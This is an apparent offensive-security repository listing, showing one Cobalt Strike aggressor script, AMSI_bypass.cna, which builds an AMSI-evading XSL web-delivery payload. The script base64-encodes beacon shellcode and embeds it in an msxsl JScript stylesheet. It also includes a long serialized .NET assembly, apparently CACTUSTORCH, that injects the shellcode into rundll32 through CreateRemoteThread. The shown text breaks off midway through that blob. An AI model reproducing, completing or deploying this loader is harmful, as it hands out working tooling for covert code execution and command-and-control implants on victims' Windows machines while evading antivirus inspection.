├── AMSI_bypass.cna
├── README.MD
└── shellcode.xsl


/AMSI_bypass.cna:
--------------------------------------------------------------------------------
  1 | # Scripted Web Delivery
  2 | # Author: @evi1cg
  3 | # setup our web delivery by pass AMSI
  4 | 
  5 | sub setup_attack {
  6 | 	local('%options $data $url $htaurl $htadata')
  7 | 	%options = $3;
  8 | 	if (%options["stageless"] eq "true"){
  9 | 			# Generate stageless payload
 10 | 			artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
 11 | 			yield;
 12 | 			$payload = $1;
 13 | 		}
 14 | 		else{
 15 | 			# Generate staged payload
 16 | 			$payload = shellcode(%options["listener"], "true", "x86");
 17 | 		}
 18 | 
 19 | 	# Generate payload with DotNetToJScript
 20 | 
 21 | 	$b64payload = base64_encode($payload);
 22 | 	$data = "";
 23 | 	$data = $data . "<?xml version='1.0'?>\r\n";
 24 | 	$data = $data . "<xsl:stylesheet version=\"1.0\"\r\n";
 25 | 	$data = $data . "xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\r\n";
 26 | 	$data = $data . "xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\r\n";
 27 | 	$data = $data . "xmlns:user=\"http://mycompany.com/mynamespace\">\r\n";
 28 | 	$data = $data . "<msxsl:script language=\"JScript\" implements-prefix=\"user\">\r\n";
 29 | 	$data = $data . "\r\n";
 30 | 	$data = $data . "<!--\r\n";
 31 | 	$data = $data . "Use msxsl to run shellcode.\r\n";
 32 | 	$data = $data . "Combine Casey Smith's msxsl POC and Cn33liz's StarFighters.\r\n";
 33 | 	$data = $data . "Link:\r\n";
 34 | 	$data = $data . "https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1\r\n";
 35 | 	$data = $data . "https://github.com/Cn33liz/StarFighters/blob/master/StarFighter.js\r\n";
 36 | 	$data = $data . "-->\r\n";
 37 | 	$data = $data . "var binary = \"rundll32.exe\";\r\n";
 38 | 	$data = $data . "var code = \"".$b64payload."\";\r\n";
 39 | 	$data = $data . "\r\n";
 40 | 	$data = $data . "function setversion() {\r\n";
 41 | 	$data = $data . "var shell = new ActiveXObject('WScript.Shell');\r\n";
 42 | 	$data = $data . "ver = 'v4.0.30319';\r\n";
 43 | 	$data = $data . "try {\r\n";
 44 | 	$data = $data . "shell.RegRead('HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\');\r\n";
 45 | 	$data = $data . "} catch(e) {\r\n";
 46 | 	$data = $data . "ver = 'v2.0.50727';\r\n";
 47 | 	$data = $data . "}\r\n";
 48 | 	$data = $data . "shell.Environment('Process')('COMPLUS_Version') = ver;\r\n";
 49 | 	$data = $data . "\r\n";
 50 | 	$data = $data . "}\r\n";
 51 | 	$data = $data . "function debug(s) {}\r\n";
 52 | 	$data = $data . "function base64ToStream(b) {\r\n";
 53 | 	$data = $data . "var enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\r\n";
 54 | 	$data = $data . "var length = enc.GetByteCount_2(b);\r\n";
 55 | 	$data = $data . "var ba = enc.GetBytes_4(b);\r\n";
 56 | 	$data = $data . "var transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\r\n";
 57 | 	$data = $data . "ba = transform.TransformFinalBlock(ba, 0, length);\r\n";
 58 | 	$data = $data . "var ms = new ActiveXObject(\"System.IO.MemoryStream\");\r\n";
 59 | 	$data = $data . "ms.Write(ba, 0, (length / 4) * 3);\r\n";
 60 | 	$data = $data . "ms.Position = 0;\r\n";
 61 | 	$data = $data . "return ms;\r\n";
 62 | 	$data = $data . "}\r\n";
 63 | 	$data = $data . "\r\n";
 64 | 	$data = $data . "function shellcode() {\r\n";
 65 | 	$data = $data . "var serialized_obj = \"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy\"+\r\n";
 66 | 	$data = $data . "\"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph\"+\r\n";
 67 | 	$data = $data . "\"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk\"+\r\n";
 68 | 	$data = $data . "\"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD\"+\r\n";
 69 | 	$data = $data . "\"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl\"+\r\n";
 70 | 	$data = $data . "\"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU\"+\r\n";
 71 | 	$data = $data . "\"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl\"+\r\n";
 72 | 	$data = $data . "\"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90\"+\r\n";
 73 | 	$data = $data . "\"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu\"+\r\n";
 74 | 	$data = $data . "\"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH\"+\r\n";
 75 | 	$data = $data . "\"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA\"+\r\n";
 76 | 	$data = $data . "\"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw\"+\r\n";
 77 | 	$data = $data . "\"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu\"+\r\n";
 78 | 	$data = $data . "\"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA\"+\r\n";
 79 | 	$data = $data . "\"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u\"+\r\n";
 80 | 	$data = $data . "\"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5\"+\r\n";
 81 | 	$data = $data . "\"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR\"+\r\n";
 82 | 	$data = $data . "\"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA\"+\r\n";
 83 | 	$data = $data . "\"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y\"+\r\n";
 84 | 	$data = $data . "\"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh\"+\r\n";
 85 | 	$data = $data . "\"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz\"+\r\n";
 86 | 	$data = $data . "\"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA\"+\r\n";
 87 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy\"+\r\n";
 88 | 	$data = $data . "\"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA\"+\r\n";
 89 | 	$data = $data . "\"AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA\"+\r\n";
 90 | 	$data = $data . "\"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA\"+\r\n";
 91 | 	$data = $data . "\"AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
 92 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA\"+\r\n";
 93 | 	$data = $data . "\"AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA\"+\r\n";
 94 | 	$data = $data . "\"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA\"+\r\n";
 95 | 	$data = $data . "\"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA\"+\r\n";
 96 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT\"+\r\n";
 97 | 	$data = $data . "\"MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA\"+\r\n";
 98 | 	$data = $data . "\"Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME\"+\r\n";
 99 | 	$data = $data . "\"EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR\"+\r\n";
100 | 	$data = $data . "\"AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA\"+\r\n";
101 | 	$data = $data . "\"AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR\"+\r\n";
102 | 	$data = $data . "\"AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V\"+\r\n";
103 | 	$data = $data . "\"AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA\"+\r\n";
104 | 	$data = $data . "\"Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu\"+\r\n";
105 | 	$data = $data . "\"NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR\"+\r\n";
106 | 	$data = $data . "\"AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA\"+\r\n";
107 | 	$data = $data . "\"ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA\"+\r\n";
108 | 	$data = $data . "\"AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh\"+\r\n";
109 | 	$data = $data . "\"BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA\"+\r\n";
110 | 	$data = $data . "\"sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9\"+\r\n";
111 | 	$data = $data . "\"AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA\"+\r\n";
112 | 	$data = $data . "\"JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/\"+\r\n";
113 | 	$data = $data . "\"AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA\"+\r\n";
114 | 	$data = $data . "\"iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED\"+\r\n";
115 | 	$data = $data . "\"AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA\"+\r\n";
116 | 	$data = $data . "\"PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH\"+\r\n";
117 | 	$data = $data . "\"AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA\"+\r\n";
118 | 	$data = $data . "\"Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/\"+\r\n";
119 | 	$data = $data . "\"AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG\"+\r\n";
120 | 	$data = $data . "\"ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS\"+\r\n";
121 | 	$data = $data . "\"AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA\"+\r\n";
122 | 	$data = $data . "\"AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA\"+\r\n";
123 | 	$data = $data . "\"AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH\"+\r\n";
124 | 	$data = $data . "\"AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD\"+\r\n";
125 | 	$data = $data . "\"AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I\"+\r\n";
126 | 	$data = $data . "\"AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF\"+\r\n";
127 | 	$data = $data . "\"ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA\"+\r\n";
128 | 	$data = $data . "\"OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+\"+\r\n";
129 | 	$data = $data . "\"BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA\"+\r\n";
130 | 	$data = $data . "\"uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE\"+\r\n";
131 | 	$data = $data . "\"AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A\"+\r\n";
132 | 	$data = $data . "\"CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ\"+\r\n";
133 | 	$data = $data . "\"AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA\"+\r\n";
134 | 	$data = $data . "\"CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw\"+\r\n";
135 | 	$data = $data . "\"AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB\"+\r\n";
136 | 	$data = $data . "\"LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz\"+\r\n";
137 | 	$data = $data . "\"AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA\"+\r\n";
138 | 	$data = $data . "\"AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA\"+\r\n";
139 | 	$data = $data . "\"AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy\"+\r\n";
140 | 	$data = $data . "\"AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP\"+\r\n";
141 | 	$data = $data . "\"TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V\"+\r\n";
142 | 	$data = $data . "\"TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD\"+\r\n";
143 | 	$data = $data . "\"UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV\"+\r\n";
144 | 	$data = $data . "\"U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW\"+\r\n";
145 | 	$data = $data . "\"RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf\"+\r\n";
146 | 	$data = $data . "\"V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf\"+\r\n";
147 | 	$data = $data . "\"TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT\"+\r\n";
148 | 	$data = $data . "\"AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM\"+\r\n";
149 | 	$data = $data . "\"QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X\"+\r\n";
150 | 	$data = $data . "\"X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU\"+\r\n";
151 | 	$data = $data . "\"QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV\"+\r\n";
152 | 	$data = $data . "\"R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG\"+\r\n";
153 | 	$data = $data . "\"QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT\"+\r\n";
154 | 	$data = $data . "\"RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS\"+\r\n";
155 | 	$data = $data . "\"SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi\"+\r\n";
156 | 	$data = $data . "\"AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU\"+\r\n";
157 | 	$data = $data . "\"aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl\"+\r\n";
158 | 	$data = $data . "\"AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA\"+\r\n";
159 | 	$data = $data . "\"bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl\"+\r\n";
160 | 	$data = $data . "\"YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli\"+\r\n";
161 | 	$data = $data . "\"dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp\"+\r\n";
162 | 	$data = $data . "\"bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs\"+\r\n";
163 | 	$data = $data . "\"eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv\"+\r\n";
164 | 	$data = $data . "\"bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0\"+\r\n";
165 | 	$data = $data . "\"cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp\"+\r\n";
166 | 	$data = $data . "\"YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp\"+\r\n";
167 | 	$data = $data . "\"ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG\"+\r\n";
168 | 	$data = $data . "\"cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr\"+\r\n";
169 | 	$data = $data . "\"ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy\"+\r\n";
170 | 	$data = $data . "\"aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj\"+\r\n";
171 | 	$data = $data . "\"dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk\"+\r\n";
172 | 	$data = $data . "\"RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj\"+\r\n";
173 | 	$data = $data . "\"cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT\"+\r\n";
174 | 	$data = $data . "\"ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz\"+\r\n";
175 | 	$data = $data . "\"AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD\"+\r\n";
176 | 	$data = $data . "\"cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA\"+\r\n";
177 | 	$data = $data . "\"ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB\"+\r\n";
178 | 	$data = $data . "\"ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj\"+\r\n";
179 | 	$data = $data . "\"dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0\"+\r\n";
180 | 	$data = $data . "\"AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl\"+\r\n";
181 | 	$data = $data . "\"UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0\"+\r\n";
182 | 	$data = $data . "\"eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP\"+\r\n";
183 | 	$data = $data . "\"AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB\"+\r\n";
184 | 	$data = $data . "\"AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O\"+\r\n";
185 | 	$data = $data . "\"Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA\"+\r\n";
186 | 	$data = $data . "\"AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA\"+\r\n";
187 | 	$data = $data . "\"BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA\"+\r\n";
188 | 	$data = $data . "\"AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC\"+\r\n";
189 | 	$data = $data . "\"ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY\"+\r\n";
190 | 	$data = $data . "\"BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB\"+\r\n";
191 | 	$data = $data . "\"AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm\"+\r\n";
192 | 	$data = $data . "\"MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA\"+\r\n";
193 | 	$data = $data . "\"AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg\"+\r\n";
194 | 	$data = $data . "\"ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA\"+\r\n";
195 | 	$data = $data . "\"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A\"+\r\n";
196 | 	$data = $data . "\"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA\"+\r\n";
197 | 	$data = $data . "\"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA\"+\r\n";
198 | 	$data = $data . "\"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs\"+\r\n";
199 | 	$data = $data . "\"AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA\"+\r\n";
200 | 	$data = $data . "\"cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA\"+\r\n";
